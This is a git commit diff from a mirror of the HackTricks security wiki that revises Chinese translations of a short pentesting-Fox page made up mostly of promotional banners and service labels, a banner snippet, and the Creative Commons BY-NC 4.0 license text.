mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md
This commit is contained in:
parent
296f2051df
commit
c196b60269
94 changed files with 3018 additions and 3164 deletions
|
@ -1,30 +1,31 @@
|
|||
# 1911 - 渗透测试狐
|
||||
# 1911 - 渗透测试狐狸
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧。
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
还有更多服务:
|
||||
以及更多服务:
|
||||
|
||||
ubiquiti-discover udp "Ubiquiti Networks设备"
|
||||
ubiquiti-discover udp "Ubiquiti Networks 设备"
|
||||
|
||||
dht udp "DHT节点"
|
||||
dht udp "DHT 节点"
|
||||
|
||||
5060 udp sip "SIP/"
|
||||
|
||||
![](<.gitbook/assets/image (273).png>)
|
||||
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
|
||||
|
||||
InfluxDB
|
||||
|
||||
|
@ -38,16 +39,17 @@ InfluxDB
|
|||
|
||||
![](<.gitbook/assets/image (341).png>)
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧。
|
||||
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为英雄级人物</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
其他支持HackTricks的方式:
|
||||
|
||||
* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边商品**](https://peass.creator-spring.com)
|
||||
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来**分享您的黑客技巧**。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
198
LICENSE.md
198
LICENSE.md
|
@ -1,145 +1,197 @@
|
|||
{% hint style="success" %}
|
||||
学习和实践AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习和实践GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为英雄级人物</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您希望在**HackTricks上看到您的公司广告**或**下载HackTricks的PDF版本**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs收藏**](https://opensea.io/collection/the-peass-family)
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**telegram群组**](https://t.me/peass)或在**Twitter**上**关注**我 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
|
||||
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
<a rel="license" href="https://creativecommons.org/licenses/by-nc/4.0/"><img alt="知识共享许可协议" style="border-width:0" src="https://licensebuttons.net/l/by-nc/4.0/88x31.png" /></a><br>版权 © Carlos Polop 2021。 除非另有说明(书中复制的外部信息属于原作者),Carlos Polop在<a href="https://github.com/carlospolop/hacktricks">HACK TRICKS</a>上的文本根据<a href="https://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用4.0国际许可协议 (CC BY-NC 4.0)</a>授权。
|
||||
<a rel="license" href="https://creativecommons.org/licenses/by-nc/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://licensebuttons.net/l/by-nc/4.0/88x31.png" /></a><br>版权所有 © Carlos Polop 2021。 除非另有规定(复制到书中的外部信息属于原始作者),Carlos Polop 的 <a href="https://github.com/carlospolop/hacktricks">HACK TRICKS</a> 上的文本受 <a href="https://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议 (CC BY-NC 4.0)</a> 许可。
|
||||
|
||||
许可证:署名-非商业性使用4.0国际 (CC BY-NC 4.0)<br>
|
||||
人类可读的许可证:https://creativecommons.org/licenses/by-nc/4.0/<br>
|
||||
完整的法律条款:https://creativecommons.org/licenses/by-nc/4.0/legalcode<br>
|
||||
格式化:https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown<br>
|
||||
许可证:署名-非商业性使用 4.0 国际许可协议(CC BY-NC 4.0)<br>
|
||||
人类可读许可证:https://creativecommons.org/licenses/by-nc/4.0/<br>
|
||||
完整法律条款:https://creativecommons.org/licenses/by-nc/4.0/legalcode<br>
|
||||
格式:https://github.com/jmatsushita/Creative-Commons-4.0-Markdown/blob/master/licenses/by-nc.markdown<br>
|
||||
|
||||
# 知识共享
|
||||
# 创意共享
|
||||
|
||||
# 署名-非商业性使用4.0国际
|
||||
# 署名-非商业性使用 4.0 国际
|
||||
|
||||
知识共享公司(“知识共享”)不是律师事务所,不提供法律服务或法律建议。知识共享公共许可证的分发不创建律师-客户或其他关系。知识共享以“现状”基础提供其许可证和相关信息。知识共享不对其许可证、任何根据其条款和条件许可的材料或任何相关信息提供任何保证。知识共享对因使用其许可证而产生的损害在最大可能范围内免责。
|
||||
创意共享公司(“创意共享”)不是律师事务所,也不提供法律服务或法律建议。创意共享公共许可的分发不会创建律师-客户或其他关系。创意共享以“原样”提供其许可证和相关信息。创意共享不对其许可证、根据其条款和条件许可的任何材料或任何相关信息提供任何担保。创意共享尽可能地免除因使用而导致的所有责任。
|
||||
|
||||
## 使用知识共享公共许可证
|
||||
## 使用创意共享公共许可证
|
||||
|
||||
知识共享公共许可证提供了一套标准的条款和条件,创作者和其他权利持有者可以使用这些条款和条件来共享原创作品和其他受版权和某些其他权利指定的材料。以下考虑仅供参考,不是详尽无遗,也不构成我们许可证的一部分。
|
||||
创意共享公共许可证提供了一套标准的条款和条件,创作者和其他权利持有人可以使用这些条款和条件来分享原创作品和其他受版权和某些其他权利约束的材料。以下考虑仅供信息目的,不是详尽无遗的,并且不构成我们许可证的一部分。
|
||||
|
||||
* __授权人的考虑:__ 我们的公共许可证旨在供有权向公众授权以其他方式受版权和某些其他权利限制的材料使用的人使用。我们的许可证是不可撤销的。授权人在应用许可证之前应阅读并理解许可证的条款和条件。授权人还应在应用我们的许可证之前确保所有必要的权利,以便公众可以按预期重用材料。授权人应明确标记任何不受许可证约束的材料。这包括其他CC许可的材料,或在版权的例外或限制下使用的材料。[授权人的更多考虑](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors)。
|
||||
* __授权者的考虑:__ 我们的公共许可证适用于那些有权向公众授予以其他方式受版权和某些其他权利限制的材料使用许可的人。我们的许可证是不可撤销的。授权者在应用许可证之前应阅读并理解他们选择的许可证的条款和条件。授权者还应在应用我们的许可证之前获得所有必要的权利,以便公众可以按预期重用材料。授权者应清楚标记任何不受许可证约束的材料。这包括其他 CC 许可的材料,或者根据版权例外或限制使用的材料。[更多授权者的考虑](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensors)。
|
||||
|
||||
* __公众的考虑:__ 通过使用我们的公共许可证之一,授权人授予公众在指定的条款和条件下使用许可材料的权限。如果出于任何原因不需要授权人的许可——例如,由于任何适用的版权例外或限制——那么该使用不受许可证的规范。我们的许可证仅授予授权人有权授予的版权和某些其他权利下的权限。出于其他原因,使用许可材料仍可能受到限制,包括因为其他人在材料中拥有版权或其他权利。授权人可能会提出特殊请求,例如要求标记或描述所有更改。尽管我们的许可证不要求,但我们鼓励您在合理的情况下尊重这些请求。[公众的更多考虑](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees)。
|
||||
* __公众的考虑:__ 通过使用我们的公共许可证之一,授权者授予公众根据指定的条款和条件使用受许可材料的许可。如果由于任何适用的版权例外或限制而不需要授权者的许可,例如由于任何适用的版权例外或限制,那么该使用不受许可证管辖。我们的许可证仅授予授权者有权授予的版权和某些其他权利下的权限。对于其他原因,例如其他人对材料拥有版权或其他权利,对受许可材料的使用仍可能受限制。授权者可以提出特殊要求,例如要求标记或描述所有更改。虽然我们的许可证不要求这样做,但鼓励您在合理的情况下尊重这些要求。[更多公众的考虑](http://wiki.creativecommons.org/Considerations_for_licensors_and_licensees#Considerations_for_licensees)。
|
||||
|
||||
# 知识共享署名-非商业性使用4.0国际公共许可证
|
||||
# 创意共享署名-非商业性使用 4.0 国际公共许可协议
|
||||
|
||||
通过行使下文定义的许可权利,您接受并同意受本知识共享署名-非商业性使用4.0国际公共许可证(“公共许可证”)的条款和条件的约束。在本公共许可证可被解释为合同的范围内,您因接受这些条款和条件而被授予许可权利,授权人因在这些条款和条件下提供许可材料而获得的利益而授予您这些权利。
|
||||
通过行使许可权(下文定义),您接受并同意受本创意共享署名-非商业性使用 4.0 国际公共许可协议(“公共许可证”)的条款和条件约束。在某种程度上,如果本公共许可证可被解释为合同,您在接受这些条款和条件的同时被授予许可权,并且许可人出于使受许可材料根据这些条款和条件可用而获得的利益,向您授予这些权利。
|
||||
|
||||
## 第1节 – 定义。
|
||||
## 第 1 节 – 定义。
|
||||
|
||||
a. __改编材料__ 指受版权和类似权利约束的材料,该材料源自或基于许可材料,并且以需要许可的方式对许可材料进行了翻译、改变、安排、转换或以其他方式修改,根据授权人持有的版权和类似权利。对于本公共许可证的目的,如果许可材料是音乐作品、表演或声音录制,则当许可材料与移动图像同步时,改编材料始终被制作出来。
|
||||
a. __改编材料__ 指根据许可材料衍生或基于许可材料的受版权和类似权利的材料,在这些材料中,许可材料被翻译、改变、排列、转换或以其他方式修改,这些修改需要许可人持有的受版权和类似权利的许可。对于本公共许可证,如果许可材料是音乐作品、表演或声音录制,那么只要许可材料与移动图像同步,就会产生改编材料。
|
||||
|
||||
b. __改编者许可证__ 指您根据本公共许可证的条款和条件,将您对改编材料中您的贡献所适用的版权和类似权利的许可证。
|
||||
b. __适配者的许可证__ 指您根据本公共许可证的条款和条件,对您对改编材料的贡献中的受版权和类似权利应用的许可证。
|
||||
|
||||
c. __版权和类似权利__ 指与版权密切相关的版权和/或类似权利,包括但不限于表演、广播、声音录制和数据库专有权,不考虑权利的标签或分类方式。对于本公共许可证的目的,第2节(b)(1)-(2)中指定的权利不是版权和类似权利。
|
||||
c. __版权和类似权利__ 指与版权密切相关的版权和/或类似权利,包括但不限于表演、广播、声音录制和独创性数据库权利,不考虑这些权利如何被标记或分类。对于本公共许可证,第 2(b)(1)-(2) 节中指定的权利不属于版权和类似权利。
|
||||
|
||||
d. __有效的技术措施__ 指在没有适当权限的情况下,根据履行1996年12月20日通过的WIPO版权条约第11条及/或类似国际协议的法律,不得规避的措施。
|
||||
d. __有效技术措施__ 指在没有适当授权的情况下,根据 1996 年 12 月 20 日通过的《世界知识产权组织版权条约》第 11 条义务履行法律下,不得规避的措施,以及类似的国际协议。
|
||||
|
||||
e. __例外和限制__ 指适用于您对许可材料使用的公平使用、公平交易和/或任何其他例外或限制版权和类似权利。
|
||||
e. __例外和限制__ 指适用于您对许可材料使用的版权和类似权利的公平使用、公平交易和/或任何其他例外或限制。
|
||||
|
||||
f. __许可材料__ 指授权人将本公共许可证应用于的艺术或文学作品、数据库或其他材料。
|
||||
f. __许可材料__ 指许可人应用本公共许可证的艺术作品、文学作品、数据库或其他材料。
|
||||
|
||||
g. __许可权利__ 指根据本公共许可证的条款和条件授予您的权利,这些权利仅限于适用于您对许可材料使用的所有版权和类似权利,以及授权人有权许可的权利。
|
||||
g. __许可权利__ 指根据本公共许可证的条款和条件授予您的权利,这些权利仅限于适用于您对许可材料使用的所有版权和类似权利,并且许可人有权许可这些权利。
|
||||
|
||||
h. __授权人__ 指在本公共许可证下授予权利的个人或实体。
|
||||
h. __许可人__ 指授予本公共许可证下的权利的个人或实体。
|
||||
|
||||
i. __非商业性__ 指不主要用于或针对商业优势或金钱补偿。对于本公共许可证的目的,通过数字文件共享或类似方式将许可材料交换为受版权和类似权利约束的其他材料是非商业性的,前提是交换过程中没有支付金钱补偿。
|
||||
i. __非商业性__ 指不主要用于或针对商业优势或货币补偿。对于本公共许可证,通过数字文件共享或类似方式将许可材料交换为其他受版权和类似权利的材料是非商业性的,只要在交换过程中没有支付货币补偿。
|
||||
|
||||
j. __分享__ 指通过任何需要许可权利许可的方式或过程向公众提供材料,例如复制、公开展示、公开表演、分发、传播、通信或进口,并以公众可以从他们各自选择的地点和时间访问材料的方式使材料可供公众使用。
|
||||
j. __分享__ 指通过任何需要许可权的方式或过程向公众提供材料,例如复制、公开展示、公开表演、分发、传播、传播或进口,并使材料可供公众访问,包括以公众可以在自己选择的时间和地点访问材料的方式。
|
||||
|
||||
k. __数据库专有权__ 指除版权之外的权利,源自1996年3月11日欧洲议会和理事会关于数据库法律保护的指令96/9/EC,以及/或修订和/或继任,以及世界其他地方的本质上等同的权利。
|
||||
k. __独创性数据库权利__ 指除版权外的其他权利,源自欧洲议会和理事会于 1996 年 3 月 11 日通过的《数据库法律保护指令》(Directive 96/9/EC),以及在世界其他地方具有本质上等效权利。
|
||||
|
||||
l. __您__ 指在本公共许可证下行使许可权利的个人或实体。您的对应含义。
|
||||
l. __您__ 指根据本公共许可证行使许可权利的个人或实体。您具有相应的含义。
|
||||
## 第2节 - 范围。
|
||||
|
||||
## 第2节 – 范围。
|
||||
a. ___许可授予。___
|
||||
|
||||
a. ___许可授权。___
|
||||
1. 根据本公共许可证的条款和条件,许可方特此向您授予全球范围内、免费、不可转让、非独占、不可撤销的许可,行使许可材料中的许可权,以便:
|
||||
|
||||
1. 根据本公共许可证的条款和条件,授权人在此授予您全球范围内的免版税、不可转授权、非独家、不可撤销的许可,以行使许可材料中的许可权利:
|
||||
A. 仅限非商业目的复制和共享许可材料的全部或部分内容;以及
|
||||
|
||||
A. 仅出于非商业目的复制和分享许可材料,无论是全部还是部分;以及
|
||||
B. 为仅限非商业目的生产、复制和共享改编材料。
|
||||
|
||||
B. 仅出于非商业目的制作、复制和分享改编材料。
|
||||
2. __例外和限制。__ 为避免疑义,如果例外和限制适用于您的使用,本公共许可证不适用,您无需遵守其条款和条件。
|
||||
|
||||
2. __例外和限制。__ 为避免疑问,如果例外和限制适用于您的使用,本公共许可证不适用,您无需遵守其条款和条件。
|
||||
3. __期限。__ 本公共许可证的期限在第6(a)节中指定。
|
||||
|
||||
3. __期限。__ 本公共许可证的期限在第6节(a)中指定。
|
||||
4. __媒体和格式;允许技术修改。__ 许可方授权您在现在已知或今后创建的所有媒体和格式中行使许可权,并进行必要的技术修改。许可方放弃和/或同意不主张任何权利或权限禁止您进行必要的技术修改以行使许可权,包括规避有效技术措施所需的技术修改。根据本公共许可证的目的,仅仅进行本节2(a)(4)部分授权的修改永远不会产生改编材料。
|
||||
|
||||
4. __媒体和格式;允许的技术修改。__ 授权人授权您在所有现在已知或以后创建的媒体和格式中行使许可权利,并进行必要的技术修改以便这样做。授权人放弃和/或同意不主张任何权利或权限禁止您进行必要的技术修改以行使许可权利,包括为规避有效的技术措施所需的技术修改。对于本公共许可证的目的,仅仅进行本第2节(a)(4)授权的修改从不产生改编材料。
|
||||
5. __下游接收方。__
|
||||
|
||||
5. __下游接收者。__
|
||||
A. __许可方提供 - 许可材料。__ 每个许可材料的接收方自动收到许可方的提供,以便根据本公共许可证的条款和条件行使许可权。
|
||||
|
||||
A. __授权人的提供 – 许可材料。__ 许可材料的每个接收者自动从授权人那里获得在本公共许可证的条款和条件下行使许可权利的提议。
|
||||
B. __无下游限制。__ 如果这样做限制了任何许可材料的接收方行使许可权,您不得提供或强加任何额外或不同的条款或条件,或应用任何有效技术措施到许可材料上。
|
||||
|
||||
B. __无下游限制。__ 您不得对许可材料提供任何额外或不同的条款或条件,或对许可材料应用任何有效的技术措施,如果这样做限制了任何接收许可材料的人行使许可权利。
|
||||
|
||||
6. __无背书。__ 本公共许可证中的任何内容均不构成或可被解释为允许声称或暗示您是,或您对许可材料的使用与授权人或其他指定接收第3节(a)(1)(A)(i)规定的归属的人有关联,或得到赞助、背书或官方地位。
|
||||
6. __无认可。__ 本公共许可证中的任何内容都不构成或不得被解释为许可主张或暗示您与许可方或其他被指定接收署名的人有关联,或得到赞助、认可或官方地位的许可方或其他人。
|
||||
|
||||
b. ___其他权利。___
|
||||
|
||||
1. 道德权利,如完整权,不在本公共许可证下许可,公众形象权、隐私权和/或其他类似人格权也不在本公共许可证下许可;然而,在可能的范围内,授权人放弃和/或同意不主张授权人持有的任何此类权利,以允许您行使许可权利的有限范围内,但不得另有规定。
|
||||
1. 道德权利,如完整性权利,不在本公共许可证下授权,宣传、隐私和/或其他类似人格权利也不在其中;然而,许可方尽可能放弃和/或同意不主张许可方持有的任何此类权利,以允许您行使许可权,但其他情况除外。
|
||||
|
||||
2. 专利权和商标权不在本公共许可证下许可。
|
||||
2. 专利和商标权不在本公共许可证下授权。
|
||||
|
||||
3. 在可能的范围内,授权人放弃任何从您那里收取行使许可权利的版税的权利,无论是直接的还是通过任何自愿或可放弃的法定或强制许可计划下的收费社会。在所有其他情况下,授权人明确保留收取此类版税的权利,包括当许可材料用于非非商业目的时。
|
||||
3. 尽可能,许可方放弃从您那里收取行使许可权的版税的权利,无论是直接还是通过任何自愿或可放弃的法定或强制性许可计划下的代收机构。在所有其他情况下,许可方明确保留收取此类版税的权利,包括在许可材料用于非商业目的以外的情况下。
|
||||
|
||||
## 第3节 – 许可条件。
|
||||
## 第3节 - 许可条件。
|
||||
|
||||
您行使许可权利明确受以下条件的约束。
|
||||
您行使许可权明确受以下条件约束。
|
||||
|
||||
a. ___署名。___
|
||||
a. ___归属。___
|
||||
|
||||
1. 如果您分享许可材料(包括修改后的形式),您必须:
|
||||
1. 如果您共享许可材料(包括修改形式),您必须:
|
||||
|
||||
A. 保留授权人随许可材料提供的以下内容(如果有):
|
||||
A. 保留以下由许可方提供的内容,如果有的话:
|
||||
|
||||
i. 以授权人要求的任何合理方式识别许可材料的创作者和任何其他指定接收署名的人(包括如果指定了化名);
|
||||
i. 许可材料的创作者和任何其他被指定接收署名的人的身份,以许可方要求的任何合理方式(包括如果被指定,使用化名);
|
||||
|
||||
ii. 版权声明;
|
||||
|
||||
iii. 提及本公共许可证的声明;
|
||||
iii. 指向本公共许可证的通知;
|
||||
|
||||
iv. 提及免责声明的声明;
|
||||
iv. 指向担保声明的通知;
|
||||
|
||||
v. 在合理可行的范围内,提供指向许可材料的URI或超链接;
|
||||
v. 在合理可行的范围内,指向许可材料的URI或超链接;
|
||||
|
||||
B. 表明您修改了许可材料并保留任何先前修改的指示;以及
|
||||
B. 指示您是否修改了许可材料,并保留任何先前修改的指示;以及
|
||||
|
||||
C. 表明许可材料在本公共许可证下许可,并包括本公共许可证的文本,或指向本公共许可证的URI或超链接。
|
||||
C. 指示许可材料是根据本公共许可证许可的,并包括本公共许可证的文本,或其URI或超链接。
|
||||
|
||||
2. 您可以根据分享许可材料的媒介、方式和上下文以任何合理的方式满足第3节(a)(1)中的条件。例如,通过提供包含所需信息的资源的URI或超链接来满足条件可能是合理的。
|
||||
2. 您可以根据您共享许可材料的媒体、方式和上下文以任何合理方式满足第3(a)(1)部分的条件。例如,通过提供指向包含所需信息的资源的URI或超链接来满足条件可能是合理的。
|
||||
|
||||
3. 如果授权人要求,您必须在合理可行的范围内删除第3节(a)(1)(A)要求的任何信息。
|
||||
3. 如果许可方要求,您必须在合理可行的范围内删除第3(a)(1)(A)部分要求的任何信息。
|
||||
|
||||
4. 如果您分享您制作的改编材料,您应用的改编者
|
||||
4. 如果您共享您制作的改编材料,您应用的适配器许可证不得阻止改编材料的接收方遵守本公共许可证。
|
||||
|
||||
## 第4节 - 特殊数据库权利。
|
||||
|
||||
如果许可权包括适用于您对许可材料使用的特殊数据库权利:
|
||||
|
||||
a. 为避免疑义,第2(a)(1)部分授予您提取、重复使用、复制和仅限非商业目的共享数据库内容全部或实质部分的权利;
|
||||
|
||||
b. 如果您在具有特殊数据库权利的数据库中包含全部或实质部分的数据库内容,则您具有特殊数据库权利的数据库(但不包括其各自的内容)属于改编材料;以及
|
||||
|
||||
c. 如果您共享数据库内容的全部或实质部分,则您必须遵守第3(a)节中的条件。
|
||||
|
||||
为避免疑义,本节4补充而不取代您在许可权包括其他版权和类似权利的情况下根据本公共许可证的义务。
|
||||
|
||||
## 第5节 - 担保声明和责任限制。
|
||||
|
||||
a. __除非许可方另行承担,尽可能,许可方按原样和按现状提供许可材料,并不就许可材料的任何性质作出任何明示或默示的陈述或担保。这包括但不限于,对所有权、适销性、特定用途适用性、非侵权、潜在缺陷或其他缺陷的不存在、准确性或错误的存在或不存在等方面的担保,无论是明示的、默示的、法定的还是其他的。在不允许全面或部分免责声明的情况下,此免责声明可能不适用于您。__
|
||||
|
||||
b. __尽可能,在任何情况下,许可方不会根据任何法律理论(包括但不限于疏忽)或其他方式对您承担任何直接、特殊、间接、附带、惩罚性、示范性或其他损失、成本、费用或损害承担责任,无论许可方是否已被告知此类损失、成本、费用或损害的可能性。在不允许全面或部分责任限制的情况下,此责任限制可能不适用于您。__
|
||||
|
||||
c. 上述的担保声明和责任限制应被解释为尽可能接近绝对免责和放弃所有责任。
|
||||
|
||||
## 第6节 - 期限和终止。
|
||||
|
||||
a. 本公共许可证适用于此处许可的版权和类似权利的期限。但是,如果您未遵守本公共许可证,则您根据本公共许可证的权利将自动终止。
|
||||
|
||||
b. 如果根据第6(a)节,您使用许可材料的权利已终止,则它将重新生效:
|
||||
|
||||
1. 在违规行为得到纠正的日期自动生效,前提是在您发现违规行为后30天内得到纠正;或
|
||||
|
||||
2. 由许可方明确重新生效。
|
||||
|
||||
为避免疑义,本节6(b)不影响许可方可能寻求救济您违反本公共许可证的任何权利。
|
||||
|
||||
